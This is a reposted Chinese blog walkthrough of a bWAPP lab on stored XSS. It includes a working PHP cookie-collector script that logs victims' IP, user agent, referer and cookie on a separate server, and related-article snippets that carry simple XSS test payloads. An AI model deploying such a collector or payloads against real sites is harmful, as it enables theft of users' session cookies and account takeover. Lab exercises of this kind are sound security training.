bwapp之xss(blog)

最新推荐文章于 2023-01-26 15:48:11 发布
最新推荐文章于 2023-01-26 15:48:11 发布
阅读量204 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/hell0w/p/7528926.html
版权

存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。

实验内容:通过存储型xss漏洞获取用户cookie

靶机:192.168.1.104(bwapp)

客户机:192.168.1.103(win7)

存放获取cookie脚本的服务器:192.1681.109(ubuntu)

 

获取cookie的php文件代码:

 1 <?php
 2 $ip = $_SERVER['REMOTE_ADDR'];
 3 $user_agent = $_SERVER['HTTP_USER_AGENT'];
 4 $referer = $_SERVER['HTTP_REFERER'];
 5 $cookie = $_GET['hack'];
 6 $content = "ip: ".$ip."\nuser_agent: ".$user_agent."\nreferer: ".$referer."\ncookie: ".$cookie."\n";
 7 $file = fopen("data.txt","a");
 8 fwrite($file,$content);
 9 fclose($file);
10 header("location: http://www.baidu.com");
11 ?>

访问靶机系统:http://192.168.1.104/bWAPP/xss_stored_1.php

输入payload

用户192.168.1.103将在访问这个页面的时候向服务器提交cookie

服务器收到请求后会在当前目录创建一个名为data.txt的文件,存放获取到的内容,其文件内容为:

 

现在我们已经获取到了cookie,接下来可以使用cookie访问用户登录之后才可以访问到的内容

 

本文固定链接:http://www.cnblogs.com/hell0w/p/7528926.html 转载请注明出处,谢谢!

转载于:https://www.cnblogs.com/hell0w/p/7528926.html

weixin_30535913
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bWAPP解法记录——XSS
bringer的博客
12-19 3114
bWAPP解法记录——XSS bWAPP简介 ​ bwapp是一个漏洞演示平台,包含100多个漏洞。可以单独下载安装,也可以下载虚拟机版本。此处给出下载地址: https://sourceforge.net/projects/bwapp/ xss漏洞练习 跨站脚本攻击的终极思路:让输入的内容在页面中回显。 1-XSS - Reflected(GET) 1)low等级 未对输入进行过滤 在...
bWAPP闯关系列(搭建+HTML Injection)~
weixin_55648772的博客
10-03 2570
bWAPP靶场闯关(html篇)
BWAPP(buggy web Application)
02-01
buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵 盖了所有主要的已知Web漏洞,包括OWASP Top10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。
bwapp XSS
h0ld1rs的博客
08-14 779
文章目录XSS - Reflected (GET)XSS - Reflected (POST)XSS - Reflected (JSON)XSS - Reflected (AJAX/JSON)XSS - Reflected (Back Button)XSS - Reflected (Custom Header)XSS - Reflected (Eval)XSS - Reflected (HREF)XSS - Reflected (Login Form)XSS - Reflected (PHP_SELF)XS
bWAPP-XSS
hee_mee的博客
01-06 312
zeronil
6.bWAPP XSS
最新发布
吾所在处,即为净土
01-26 745
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Bwapp之XSS –stored
hl1293348082的专栏
03-29 226
XSS 全称:跨站脚本( Cross Site Scripting ),为了不和层叠样式表( Cascading Style Sheets )的缩写 CSS 混合,所以改名为 XSS;攻击者会向 web 页面( input 表单、 URL 、留言版等位置)插入恶意 JavaScript 代码,导致 管理员/用户 访问时触发,从而达到攻击者的目的。 XSS 的危害:窃取管理员/用户的 cookie 非法登录,导致网站被挂马、服务器沦陷被控制等等…… XSS 类型:反射型、存储型、 DOM 型 0x01
bWAPP通关记录(A3~xss)
qq_39670065的博客
08-16 1403
@[TOC](A3- Cross-Site Scripting (XSS)) Cross- Site Scripting - Reflected (GET) Cross-Site Scripting - Reflected (POST) Cross-Site Scripting - Reflected (JSON) Cross-Site Scripting - Reflected (AJAX/JSON) Cross-Site Scripting - Reflected (AJAX/XML) Cross-Si
bWAPP漏洞测试环境.rar
04-06
bWAPP,全称为"Black Box Web Application Penetration Testing Framework",是一款用于安全专业人士和学生进行Web应用漏洞测试的...在使用过程中,结合文档和博客中的说明,将有助于更顺利地搭建和利用这个测试环境。
bWAPP之环境搭建及HTML注入
世间繁华梦一出
04-28 743
一、环境搭建 在phpstudy这一集成环境中搭建此漏洞练习靶场 (1)下载链接: https://sourceforge.net/projects/bwapp/files/latest/download (2)安装步骤: 下载后解压文件,将文件放在WWW目录下 在admin/settings.php下更改数据库连接设置 username和password设置成自己数据库的用户名和密码 3. 运行PHPStudy,然后在浏览器打开http://127.0.0.1/bWAPP/install.php
bWAPP----HTML Injection - Stored (Blog)
weixin_30371469的博客
07-11 550
HTML Injection - Stored (Blog) 界面 1 <div id="main"> 2 3 <h1>HTML Injection - Stored (Blog)</h1> 4 5 <form action="<?php echo($_SERVER["SC...
bwapp medium writeup
公众号shadow sock7
06-15 4257
HTML injection(XSS)set security level as low很简单,正常的就可以绕过http://192.168.170.130/bWAPP/htmli_get.php?firstname=%25%33%63script%25%33%65alert(/XSS/)%25%33%63/script%25%33%65&lastname=%25%33%63script%25%33
【bWAPP】XSS通关记录
qq_43665434的博客
03-16 1087
【bWAPP】XSS总结 XSS-Reflected(GET与POST)解法很常规,low和mediu级别只过滤单引号,high级别用htmlspecialchars()和htmlentities(),总结以下二者区别吧。 htmlspecialchars()与htmlentities()的区别 htmlspecialchars()将以下字符转换为HTML实体 &成为&amp; "成为&quot; '不变 (设置了ENT_QUOTES后编码为&#039;或&amp
bWAPP XSS
angry_program的博客
03-08 909
0x01、XSS - Reflected (GET) Low 输入的内容直接输出到页面中: 后台服务端没有对输入的参数进行过滤, 直接任选一个注入xss payload即可: <script>alert(1)</script> Medium 虽然服务端进行了过滤, 但只是addslashes()函数而已(防sql注入), 依旧可以xss: ...
bWAPP解题笔记——XSS
FunkyPants的博客
09-06 3910
XSS 在chrome上,需要先关闭xss保护 反射型 low 对输入未做过滤 $data = no_check($data); 输入&lt;script&gt;alert(document.cookie)&lt;/script&gt; middle 输入校验 function xss_check_4($data) { // addsla...
bWAPP中利用反射型xss获取cookie
****的博客
09-10 538
实验环境介绍 靶机:bWAPP bug类型:XSS - Reflected (GET) 难度级别:low 过程: 注:部分浏览器默认开启了XSS防御,关闭后才能实验成功。 测试靶机(图中的web server)是否存在XSS攻击。 URL地址:“http://192.168.248.174/dvwa/bWAPP/xss_get.php” 输入js代码 <script>alert(1...
XSS(Stored)
kid的博客
05-02 2933
XSS(Stored) 前言 看了一个web的安全视频,里面有说说有的web漏洞都是输入输出的控制问题,虽然感觉说的太笼统了。但确实没什么毛病。sql注入来说,对用户的输入做好处理,对服务端的输出做好处理,对于我这样的菜鸡来说就很难了(字符型注入对单引号转义就感觉好难做啊) XSS也是这样。因为对用户输入控制的不严格,让用户的输入被当做代码执行。这和sql感觉就十分相似了。只不过一个是对数据库一个...
xss漏洞测试(cookie的窃取和利用,钓鱼,键盘记录)
qq_43814486的博客
05-03 4002
cookie的窃取和利用
bWAPP练习
zhaji001
12-06 9656
简介 虚拟机下载地址: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/ 如果你想自己去部署环境:https://sourceforge.net/projects/bwapp/files/bee-box/ bWAPP包含有100多个漏洞,包括OWASP Top10安全风险,很爽的PHPweb靶机。 登录username:bee  pas...
揭示Web安全挑战:XSS攻击原理与防范策略
Web安全性测试之XSS(Cross-Site Scripting)是一项至关重要的任务,特别是在现代Web应用中。XSS漏洞是一种常见的Web安全威胁,攻击者通过在网页中嵌入恶意客户端脚本,如JavaScript,利用用户浏览器的执行能力来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值